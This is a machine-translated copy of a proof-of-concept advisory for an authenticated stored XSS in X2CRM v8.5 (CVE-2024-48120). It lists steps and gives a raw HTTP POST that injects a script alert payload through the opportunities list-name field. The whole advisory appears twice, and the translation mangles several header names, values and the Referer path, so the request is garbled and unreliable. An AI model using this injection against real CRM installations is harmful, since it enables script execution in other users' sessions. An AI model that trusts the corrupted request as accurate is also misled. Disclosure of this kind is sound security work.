#利用标题: X2CRM V8.5 - 存储的跨站点脚本(XSS)(认证)
#Date: 2024年9月12日
#利用作者: Okan Kurtulus
#供应商homepage: https://x2engine.com/
#软件link: https://github.com/x2engine/x2crm
#版本: X2CRM v8.5
#测试在: Ubuntu 22.04
#CVE : CVE-2024-48120
1-)使用任何用户帐户登录到系统。从顶部菜单中导航到“机会”部分,然后选择“创建列表”。在新屏幕的“名称”字段中,输入恶意XSS有效载荷,然后单击“创建”。
2-)接下来,返回“机会”选项卡,然后再次单击“列表”。存储的XSS有效载荷将被触发。
XSS触发请求:
post/x2crm/x2engine/index.php/opportunities/createlist http/1.1
HOST: 192.168.1.108
用户- 代理: Mozilla/5.0(Windows NT 10.0; Win64; X64; rv:130.0)Gecko/20100101 Firefox/130.0
ACCEPT: TEXT/HTML,应用程序/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,Image/png,Image/svg+xml,/; q=0.8
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,Deflate,br
content-type:应用程序/x-www-form-urlenceded
内容长度: 390
Origin: http://192.168.1.108
Connection:保持空白
Referer: http://192.168.1.108/x2crm/x2engine/index.php/oppoinsper/createlist
cookie: phpsessid=uijrtnp42qqo29vfkb4v0sps3i; yii_csrf_token=rkw1swxtc1dpa0z0ogdpb1rxy0zgvdy5x3ppmzvftdgjgjgt_kjmglfkvrci_y9oo4f0qihtvqibswqbswqbswqbswqbsw1t9uvvxl4g%3D%3D; 5D8630D289284E8C14D15B14F4B4DC28=9D5B82F1240EB47CD73A20DF560D9B3086847E33A%3A4%3A4%3A4%3A%7BI%3A0 %3BS%3A1%3A%223%22%3BI%3A4%3A%22 -test%22%22%3A2%3A2%3BI%3A2592000%3BI%3A3%3A3%3BA%3A0%3A0%3A0%3A%3A%7B%7d%7d%7d; loginform [username]=test;登录名[记住我]=1
升级- 不肯定- requests: 1
Priority: u=0,i
yii_csrf_token=rkw1swxtc1dpa0z0ogdpb1rxy0zgvdy5x3ppmzvftdgjgjgjgt_kjmglfkvrci_y9oo4f0qihntvqbsw1t9u VVXL4G%3D%3DX2LIST%5bName%5D=%3Cscript%3ealert%282%29%3B%3C%2FScript%3Ex2List%3EX2LIST%5BType%5D=动态X2LIST%5BASSIGNEDTO%5D=test2x2list%5BVisibility%5D=1x2List%5Blogictype%5D=Andx2List%5BATTRIBUTE %5D%5B%5D=替代Emailx2List%5BComparison%5D%5D%5D=%3DX2LIST%5BVALUE%5D%5D%5B%5D=TESTYT0=CREATE
#Date: 2024年9月12日
#利用作者: Okan Kurtulus
#供应商homepage: https://x2engine.com/
#软件link: https://github.com/x2engine/x2crm
#版本: X2CRM v8.5
#测试在: Ubuntu 22.04
#CVE : CVE-2024-48120
1-)使用任何用户帐户登录到系统。从顶部菜单中导航到“机会”部分,然后选择“创建列表”。在新屏幕的“名称”字段中,输入恶意XSS有效载荷,然后单击“创建”。
2-)接下来,返回“机会”选项卡,然后再次单击“列表”。存储的XSS有效载荷将被触发。
XSS触发请求:
post/x2crm/x2engine/index.php/opportunities/createlist http/1.1
HOST: 192.168.1.108
用户- 代理: Mozilla/5.0(Windows NT 10.0; Win64; X64; rv:130.0)Gecko/20100101 Firefox/130.0
ACCEPT: TEXT/HTML,应用程序/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,Image/png,Image/svg+xml,/; q=0.8
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,Deflate,br
content-type:应用程序/x-www-form-urlenceded
内容长度: 390
Origin: http://192.168.1.108
Connection:保持空白
Referer: http://192.168.1.108/x2crm/x2engine/index.php/oppoinsper/createlist
cookie: phpsessid=uijrtnp42qqo29vfkb4v0sps3i; yii_csrf_token=rkw1swxtc1dpa0z0ogdpb1rxy0zgvdy5x3ppmzvftdgjgjgt_kjmglfkvrci_y9oo4f0qihtvqibswqbswqbswqbswqbsw1t9uvvxl4g%3D%3D; 5D8630D289284E8C14D15B14F4B4DC28=9D5B82F1240EB47CD73A20DF560D9B3086847E33A%3A4%3A4%3A4%3A%7BI%3A0 %3BS%3A1%3A%223%22%3BI%3A4%3A%22 -test%22%22%3A2%3A2%3BI%3A2592000%3BI%3A3%3A3%3BA%3A0%3A0%3A0%3A%3A%7B%7d%7d%7d; loginform [username]=test;登录名[记住我]=1
升级- 不肯定- requests: 1
Priority: u=0,i
yii_csrf_token=rkw1swxtc1dpa0z0ogdpb1rxy0zgvdy5x3ppmzvftdgjgjgjgt_kjmglfkvrci_y9oo4f0qihntvqbsw1t9u VVXL4G%3D%3DX2LIST%5bName%5D=%3Cscript%3ealert%282%29%3B%3C%2FScript%3Ex2List%3EX2LIST%5BType%5D=动态X2LIST%5BASSIGNEDTO%5D=test2x2list%5BVisibility%5D=1x2List%5Blogictype%5D=Andx2List%5BATTRIBUTE %5D%5B%5D=替代Emailx2List%5BComparison%5D%5D%5D=%3DX2LIST%5BVALUE%5D%5D%5B%5D=TESTYT0=CREATE